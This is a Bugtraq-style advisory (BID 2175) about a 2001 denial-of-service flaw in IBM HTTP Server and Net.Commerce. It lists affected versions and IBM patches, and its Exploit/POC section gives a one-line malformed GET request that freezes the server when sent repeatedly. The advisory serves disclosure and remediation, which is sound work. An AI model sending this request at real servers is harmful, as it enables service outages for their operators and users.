IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
BID:2175
Info
IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
| Bugtraq ID: | 2175 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 08 2001 12:00AM |
| Updated: | Jan 08 2001 12:00AM |
| Credit: | Discovered and posted to Bugtraq on Jan 8, 2001 by Peter <[email protected]>. |
| Vulnerable: |
IBM Net.Commerce Hosting Server 3.1.1 IBM Net.Commerce 3.1.1 IBM Net.Commerce 3.1 IBM Net.Commerce 3.0 IBM Net.Commerce 2.0 IBM HTTP Server 1.3.12 .2 IBM HTTP Server 1.3.6 .4 win32 |
| Not Vulnerable: | |
Discussion
IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
IBM HTTP Server contains AfpaCache directive which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications which are built upon IBM HTTP Server.
Both IBM HTTP Server and Websphere are subject to a denial of service. This is caused by exhausting computer resources with malformed HTTP GET requests. A restart of the service is required inorder to gain normal functionality.
IBM HTTP Server contains AfpaCache directive which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications which are built upon IBM HTTP Server.
Both IBM HTTP Server and Websphere are subject to a denial of service. This is caused by exhausting computer resources with malformed HTTP GET requests. A restart of the service is required inorder to gain normal functionality.
Exploit / POC
IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
The following example has been provided by Peter <[email protected]>:
GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n
This request must be made multiple times before the system will freeze.
The following example has been provided by Peter <[email protected]>:
GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n
This request must be made multiple times before the system will freeze.
Solution / Fix
IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
IBM HTTP Server 1.3.12 .2
IBM Net.Commerce 2.0
IBM Net.Commerce 3.0
IBM Net.Commerce 3.1
IBM Net.Commerce 3.1.1
IBM Net.Commerce Hosting Server 3.1.1
IBM HTTP Server 1.3.12 .2
-
IBM PQ42463
Fixes "Failure to handle memory exception in Fast Response Cache Accelerator (FRCA) can cause a vulnerability in IBM HTTP Server".
http://www6.software.ibm.com/dl/websphere09/ihttpcorsvc-p
IBM Net.Commerce 2.0
-
IBM net.data1.014 patch
Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
ftp://ftp.software.ibm.com/software/netcommerce/
IBM Net.Commerce 3.0
-
IBM net.data1.014 patch
Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
ftp://ftp.software.ibm.com/software/netcommerce/
IBM Net.Commerce 3.1
-
IBM net.data1.014 patch
Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
ftp://ftp.software.ibm.com/software/netcommerce/
IBM Net.Commerce 3.1.1
-
IBM net.data1.014 patch
Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
ftp://ftp.software.ibm.com/software/netcommerce/
IBM Net.Commerce Hosting Server 3.1.1
-
IBM net.data1.014 patch
Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
ftp://ftp.software.ibm.com/software/netcommerce/